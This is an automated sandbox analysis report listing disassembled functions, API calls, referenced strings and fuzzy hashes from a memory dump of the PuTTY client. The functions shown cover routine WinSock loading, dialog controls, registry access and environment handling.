Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: AddressProc$Startup$LibraryLoad
String ID: Unable to initialise WinSock$Unable to load any WinSock library$WSAAddressToStringA$WSAAsyncSelect$WSACleanup$WSAEnumNetworkEvents$WSAEventSelect$WSAGetLastError$WSAIoctl$WSAStartup$accept$bind$closesocket$connect$freeaddrinfo$getaddrinfo$gethostbyname$gethostname$getnameinfo$getpeername$getservbyname$htonl$htons$inet_addr$inet_ntoa$inet_ntop$ioctlsocket$listen$ntohl$ntohs$recv$select$send$setsockopt$shutdown$socket$ws2_32.dll$wship6.dll$wsock32.dll
API String ID: 1450042416-3487058210
Opcode ID: 84c9a20ae4abbc27b5cbb203c41fe1c90c099f11b21f31ec996aed58253b097b
Instruction ID: 8a71388561311a24d6a1fe240973e133cb9dc14973f8af55217d2b2fec761288
Opcode Fuzzy Hash: 84c9a20ae4abbc27b5cbb203c41fe1c90c099f11b21f31ec996aed58253b097b
Instruction Fuzzy Hash: E8126D24A0AF23A4FE55DB1CF96437832A0BF4CB51F644935DA4EC62B4EF7CA4488B51

Function 00007FF6BB2A738D Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 277windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32 ref: 00007FF6BB2A7F89

Part of subcall function 00007FF6BB34B8AC: _set_error_mode.LIBCMT ref: 00007FF6BB34B8D3

Strings

0, xrefs: 00007FF6BB2A7E92
LISTBOX, xrefs: 00007FF6BB2A7965
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00007FF6BB2A801D, 00007FF6BB2A804C, 00007FF6BB2A80AF
ud, xrefs: 00007FF6BB2A73F8
COMBOBOX, xrefs: 00007FF6BB2A7EBF
STATIC, xrefs: 00007FF6BB2A78D0, 00007FF6BB2A7D0B, 00007FF6BB2A7E5E
ret == c, xrefs: 00007FF6BB2A8016, 00007FF6BB2A8045
!dp->shortcuts[s], xrefs: 00007FF6BB2A80A8

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: ItemMessageSend_set_error_mode
String ID: !dp->shortcuts[s]$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$0$COMBOBOX$LISTBOX$STATIC$ret == c$ud
API String ID: 3184551911-1172212562
Opcode ID: 2b850a285375d74d7a382117df9820055b2f4888356849c9d406807692e2fb38
Instruction ID: 3f77cf9cded43c615a55acd7162518102f068b66d049776bd1f7851b51f519af
Opcode Fuzzy Hash: 2b850a285375d74d7a382117df9820055b2f4888356849c9d406807692e2fb38
Instruction Fuzzy Hash: 32D19472A082828AE734CF19E554BBAB7A5F788784F044235DB9987BA9DF3DD504CF04

Function 00007FF6BB2A50B0 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 27
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6BB2C62C0: LoadLibraryA.KERNELBASE ref: 00007FF6BB2C62E9

GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851C6), ref: 00007FF6BB2A50D6
GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851C6), ref: 00007FF6BB2A50E9
GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851C6), ref: 00007FF6BB2A50FC
GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851C6), ref: 00007FF6BB2A510F

Strings

comctl32.dll, xrefs: 00007FF6BB2A50B6
MakeDragList, xrefs: 00007FF6BB2A50DF
InitCommonControls, xrefs: 00007FF6BB2A50C5
LBItemFromPt, xrefs: 00007FF6BB2A50F2
DrawInsert, xrefs: 00007FF6BB2A5105

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: DrawInsert$InitCommonControls$LBItemFromPt$MakeDragList$comctl32.dll
API String ID: 2238633743-1292723818
Opcode ID: 1ceaf7155ecd03161351fddca303b4193d1e52932bc681fbbfa33e8f2c238560
Instruction ID: 367194740533930c936ab254bb4f0dd235c0c368a5cf8e39f5d7df51fe9fa28e
Opcode Fuzzy Hash: 1ceaf7155ecd03161351fddca303b4193d1e52932bc681fbbfa33e8f2c238560
Instruction Fuzzy Hash: E8F01D64A09A0691F905AB1DFD500AC73A5BF0C7D1B618132CA0D87374EF7CE556CB41

Function 00007FF6BB2D4BC0 Relevance: 13.6, APIs: 9, Instructions: 94
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadCursorA.USER32 ref: 00007FF6BB2D4C36
RegisterClassA.USER32 ref: 00007FF6BB2D4C69
CreateDialogParamA.USER32 ref: 00007FF6BB2D4CBA
SetWindowLongPtrA.USER32 ref: 00007FF6BB2D4CCE
GetMessageA.USER32 ref: 00007FF6BB2D4D15
IsDialogMessageA.USER32 ref: 00007FF6BB2D4D2B
DispatchMessageA.USER32 ref: 00007FF6BB2D4D35
PostQuitMessage.USER32 ref: 00007FF6BB2D4D40
DestroyWindow.USER32 ref: 00007FF6BB2D4D49

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Message$DialogWindow$ClassCreateCursorDestroyDispatchLoadLongParamPostQuitRegister
String ID:
API String ID: 4008243408-0
Opcode ID: 8dc0eb86304c87fce5710041ab16b5df4aff4e4aec2429a9720ab6fd90c5c869
Instruction ID: a52ea5432798a102a7975b0e52c72d1bdfbe8614ce7e3cf332e6081eca5f7b2e
Opcode Fuzzy Hash: 8dc0eb86304c87fce5710041ab16b5df4aff4e4aec2429a9720ab6fd90c5c869
Instruction Fuzzy Hash: 39413B21A08BC585FB648B19F9543BAB7A0FB89B94F554134DE8D87B64DF3CE449CB00

Function 00007FF6BB2A728F Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 269
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageA.USER32 ref: 00007FF6BB2A72F1

Strings

(ctrl->columns.ncols == 1) ^ (ncols == 1), xrefs: 00007FF6BB2A694B
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00007FF6BB2A6952, 00007FF6BB2A6984, 00007FF6BB2A801D, 00007FF6BB2A804C, 00007FF6BB2A80AF
ncols <= lenof(columns), xrefs: 00007FF6BB2A697D
BUTTON, xrefs: 00007FF6BB2A733E
ret == c, xrefs: 00007FF6BB2A8016, 00007FF6BB2A8045
!dp->shortcuts[s], xrefs: 00007FF6BB2A80A8

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: MessageSend
String ID: !dp->shortcuts[s]$(ctrl->columns.ncols == 1) ^ (ncols == 1)$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$BUTTON$ncols <= lenof(columns)$ret == c
API String ID: 3850602802-881213205
Opcode ID: 0942e10c07dd19d4366c9879598424232ce0e9594788759ff9c4c0e0d75d8a4a
Instruction ID: b3968c69269e88d397ff41e59d4ecab8233e46fffb549cc479bb83193b347ac4
Opcode Fuzzy Hash: 0942e10c07dd19d4366c9879598424232ce0e9594788759ff9c4c0e0d75d8a4a
Instruction Fuzzy Hash: F5D1C062A08AC285EB219B1DE5453FAB7A0FB98784F045135DF8D83BA5EF7DE544CB00

Function 00007FF6BB2BC930 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 399
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

demo-server-2, xrefs: 00007FF6BB2BC96A
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/config.c, xrefs: 00007FF6BB34F3A0
demo-server, xrefs: 00007FF6BB2BC95B
Default Settings, xrefs: 00007FF6BB2BCA29, 00007FF6BB2BCA75, 00007FF6BB2BCA8D

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID:
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/config.c$Default Settings$demo-server$demo-server-2
API String ID: 0-294979178
Opcode ID: f3acc317483267b1136af0bed1c6649380b0a044f7afd3772e5942701c66107e
Instruction ID: be21256b3130fb50fb2ba032f75cb391aea30840a86d907b1e053fd8f9152b31
Opcode Fuzzy Hash: f3acc317483267b1136af0bed1c6649380b0a044f7afd3772e5942701c66107e
Instruction Fuzzy Hash: 3DE1E262B1DA9245EA20AF2AA9043BA6791BB4DFC0F4C4431DF4D9B7B5DE3EE444D300

Function 00007FF6BB2A51E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MapDialogRect.USER32 ref: 00007FF6BB2A5200
CreateWindowExA.USER32 ref: 00007FF6BB2A526F
SendMessageA.USER32 ref: 00007FF6BB2A528A
SetWindowPos.USER32 ref: 00007FF6BB2A52C4

Strings

LISTBOX, xrefs: 00007FF6BB2A5290

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Window$CreateDialogMessageRectSend
String ID: LISTBOX
API String ID: 4261271132-1812161947
Opcode ID: 4675824aa6d38a0693fc2184b3d9715887497bee4671b815ee1fa70ff92b6202
Instruction ID: 38b3a13e009b3a4617ac8dc28bb8c0b44548984df718827d4e5288192c44f298
Opcode Fuzzy Hash: 4675824aa6d38a0693fc2184b3d9715887497bee4671b815ee1fa70ff92b6202
Instruction Fuzzy Hash: 34212D766086818BEB648F5AF840A5AB7A0F788B94F148135EF8D83B64DF3CE4458F00

Function 00007FF6BB2A9C10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 81
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendDlgItemMessageA.USER32 ref: 00007FF6BB2A9CD1
SendDlgItemMessageA.USER32 ref: 00007FF6BB2A9CEB

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00007FF6BB2A9C72
c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list)), xrefs: 00007FF6BB2A9C6B

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: ItemMessageSend
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list))
API String ID: 3015471070-2883471717
Opcode ID: c90d57f835871b3c7a2068380126451181b6ba045c18c22e5594f4d080dd311e
Instruction ID: c50b34cbafe04b194ca508ace705b9b7b687bc5e682e129033db76f223c26515
Opcode Fuzzy Hash: c90d57f835871b3c7a2068380126451181b6ba045c18c22e5594f4d080dd311e
Instruction Fuzzy Hash: 9821B132B08A0596EB208B1AED817B87791FB8CB88F448135CF4D87BA1DE3DE445CB00

Function 00007FF6BB2AB080 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28libraryloaderCOMMON

Download Yara Rule

APIs

SetCurrentProcessExplicitAppUserModelID.SHELL32(?,?,?,?,00007FF6BB2851CB), ref: 00007FF6BB2AB0A2
GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851CB), ref: 00007FF6BB2AB0D1

Strings

Shell32.dll, xrefs: 00007FF6BB2AB0AF
SetCurrentProcessExplicitAppUserModelID, xrefs: 00007FF6BB2AB0C7

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: AddressCurrentExplicitModelProcProcessUser
String ID: SetCurrentProcessExplicitAppUserModelID$Shell32.dll
API String ID: 3773935857-666802935
Opcode ID: e99164f67605c088b727e0c9cef3b392adfa946bdb2509b44dcdd0af9dd94b68
Instruction ID: ad4f6944fa7f805b5628b102d456d7af9b78255ab9f05acd475abe4cf0091e67
Opcode Fuzzy Hash: e99164f67605c088b727e0c9cef3b392adfa946bdb2509b44dcdd0af9dd94b68
Instruction Fuzzy Hash: A2F0F918E0AB03A4FE15AB1DA99837922917F1C740FA40438C61DD23B1EF7DA444DB10

Function 00007FF6BB2C6460 Relevance: 6.1, APIs: 4, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6BB38EAB3,00000000), ref: 00007FF6BB2C652D
RegOpenKeyExA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6BB38EAB3,00000000), ref: 00007FF6BB2C6551
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6BB38EAB3,00000000), ref: 00007FF6BB2C6565
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6BB38EAB3,00000000), ref: 00007FF6BB2C6576

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Close$CreateOpen
String ID:
API String ID: 1299239824-0
Opcode ID: ea6bdc6d0fe87ce883ce7ae428e77d2f7ab380fdb98498e39f7f47fe4c6a4590
Instruction ID: 468571ac8398a1edb9d2f493d68440310ed1f9889d0f88d844502ed8ea584396
Opcode Fuzzy Hash: ea6bdc6d0fe87ce883ce7ae428e77d2f7ab380fdb98498e39f7f47fe4c6a4590
Instruction Fuzzy Hash: 6E31A432A1879641EA21CB59F950B7AB794BB88BE4F610131EF8D87B68DF7DD4418B00

Function 00007FF6BB2D6440 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00007FF6BB2D6459
GetWindowRect.USER32 ref: 00007FF6BB2D6467
GetWindowRect.USER32 ref: 00007FF6BB2D6479
MoveWindow.USER32 ref: 00007FF6BB2D64D6

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Window$Rect$DesktopMove
String ID:
API String ID: 2894293738-0
Opcode ID: 20ecea4b81a27fe78413c901b6bf14b61497c1ef27ae127f0af0f9314dea5a0a
Instruction ID: 6246e9c7d853a0d95685cbe89df99c592385153e0cdf09f61015a0e5d32f4e5c
Opcode Fuzzy Hash: 20ecea4b81a27fe78413c901b6bf14b61497c1ef27ae127f0af0f9314dea5a0a
Instruction Fuzzy Hash: 18119032B1861187EA20CF29F80452EB760FBC9B90F559130EF4997BA8DE3DE4418F40

Function 00007FF6BB2A9B30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32 ref: 00007FF6BB2A9BD4

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00007FF6BB2A9B8F
c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list)), xrefs: 00007FF6BB2A9B88

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: ItemMessageSend
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list))
API String ID: 3015471070-2883471717
Opcode ID: f2c6e618a18827751ec8177bb15fb0ac7d5fcf813854ffeaddd1338c36183962
Instruction ID: 29df49a4c5edf379f6feca8f56da6e5d18562bfe31249598d7a3b5257f81013b
Opcode Fuzzy Hash: f2c6e618a18827751ec8177bb15fb0ac7d5fcf813854ffeaddd1338c36183962
Instruction Fuzzy Hash: 69219D32B0860585EB608B1ADA857B83790FB8DB94F458436CF0D877A4DE3DE485CB00

Function 00007FF6BB35AD1C Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNELBASE(?,?,000002295070DC10,00007FF6BB34AC4F), ref: 00007FF6BB35AD35
FreeEnvironmentStringsW.KERNEL32(?,?,000002295070DC10,00007FF6BB34AC4F), ref: 00007FF6BB35ADA7

Part of subcall function 00007FF6BB355070: HeapAlloc.KERNEL32(?,?,?,00007FF6BB353F1F), ref: 00007FF6BB3550AE

FreeEnvironmentStringsW.KERNEL32(?,?,000002295070DC10,00007FF6BB34AC4F), ref: 00007FF6BB35AE06

Part of subcall function 00007FF6BB3544E4: HeapFree.KERNEL32(?,?,?,00007FF6BB358382,?,?,?,00007FF6BB357F43,?,?,00000000,00007FF6BB358C14,?,?,?,00007FF6BB358B1F), ref: 00007FF6BB3544FA
Part of subcall function 00007FF6BB3544E4: GetLastError.KERNEL32(?,?,?,00007FF6BB358382,?,?,?,00007FF6BB357F43,?,?,00000000,00007FF6BB358C14,?,?,?,00007FF6BB358B1F), ref: 00007FF6BB354504

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: EnvironmentFreeStrings$Heap$AllocErrorLast
String ID:
API String ID: 3331406755-0
Opcode ID: a45e6d22cd07cd63e0af45f8e0aec387eba93631c0cee08984bed8e70762c5ed
Instruction ID: f88cda20490cc39acebde80b709a536e7d403ccd32bc0423ece9eaf2f86d5b51
Opcode Fuzzy Hash: a45e6d22cd07cd63e0af45f8e0aec387eba93631c0cee08984bed8e70762c5ed
Instruction Fuzzy Hash: B831B161A5875281EA64AF2AA45007E77A0BF4CBD0F484236EB4E83BE5DF3CE4519708

Function 00007FF6BB2A4A30 Relevance: 4.5, APIs: 3, Instructions: 35COMMON

Download Yara Rule

APIs

